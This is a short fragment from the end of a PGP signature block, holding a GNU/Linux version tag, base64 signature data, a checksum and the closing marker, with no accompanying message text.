(GNU/Linux) iD8DBQFJnw7rmqjQ0CJFipgRAmLjAKCE5sjxDlTUtrlE1zTgBeOZuO3hoQCcC3P1 ixex+39sZFdGUlvQ+WPmOGY= =bJlR -END PGP SIGNATURE-
